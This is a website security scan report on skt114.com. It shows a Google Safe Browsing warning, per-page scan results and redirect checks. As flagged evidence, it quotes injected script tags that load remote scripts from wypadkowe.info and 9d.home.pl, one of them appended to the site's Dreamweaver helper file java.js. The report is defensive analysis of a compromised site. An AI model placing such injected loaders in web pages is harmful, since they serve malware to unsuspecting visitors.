Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skt114.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://skt114.com/ | 200 OK Content-Length: 6740 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824756"></script> | ||
http://skt114.com/css_js/java.js | 200 OK Content-Length: 3696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The part that appears to be injected is the final document.write() call, which loads a script from an external host; the MM_* functions before it are standard Dreamweaver-generated helpers. Excerpt (truncated by the scanner where marked [...]): function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc [...] "</object>"; document.write(flashStr1); } function bluring(){ if(event.srcElement.tagName=="A"||event.srcElement.tagName=="IMG") document.body.focus(); } document.onfocusin=bluring; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://skt114.com/board/qna.htm | 200 OK Content-Length: 4779 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/board/../css_js/java.js | 200 OK Content-Length: 3696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below): function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc [...] "</object>"; document.write(flashStr1); } function bluring(){ if(event.srcElement.tagName=="A"||event.srcElement.tagName=="IMG") document.body.focus(); } document.onfocusin=bluring; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://skt114.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://skt114.com/online/03.htm | 200 OK Content-Length: 15641 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/online/../css_js/java.js | 200 OK Content-Length: 3696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below): function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc [...] "</object>"; document.write(flashStr1); } function bluring(){ if(event.srcElement.tagName=="A"||event.srcElement.tagName=="IMG") document.body.focus(); } document.onfocusin=bluring; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://skt114.com/online/../bbs/_template/admin/default/member_fun.js | 200 OK Content-Length: 10834 Content-Type: application/x-javascript | clean |
http://skt114.com/online/01.htm | 200 OK Content-Length: 11370 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/online/02.htm | 200 OK Content-Length: 122754 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://wypadkowe.info/tbcmdfmz.php?id=45824794"></script> | ||
http://skt114.com/number_data/070_form.xls | 200 OK Content-Length: 30208 Content-Type: application/vnd.ms-excel | clean |
http://skt114.com/number_data/1599_form.doc | 200 OK Content-Length: 60416 Content-Type: application/msword | clean |
http://skt114.com/number_data/internet_form.xls | 200 OK Content-Length: 12765 Content-Type: application/vnd.ms-excel | clean |
http://skt114.com/online/ | 403 Forbidden Content-Length: 284 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skt114.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:46:13 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 6740
Content-Type: text/html; charset=EUC-KR
Set-Cookie: cookie_referer=596fb162acdadbf44a9517d83d4fdfc5; path=/
X-Powered-By: PHP/4.4.9
...6740 bytes of data.
GET / HTTP/1.1
Host: skt114.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:46:13 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 6740
Content-Type: text/html; charset=EUC-KR
Set-Cookie: cookie_referer=596fb162acdadbf44a9517d83d4fdfc5; path=/
X-Powered-By: PHP/4.4.9
...6740 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: skt114.com
Referer: http://www.google.com/search?q=skt114.com
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: skt114.com
Referer: http://www.google.com/search?q=skt114.com
Result:
The result is similar to the first query. No suspicious redirects were found.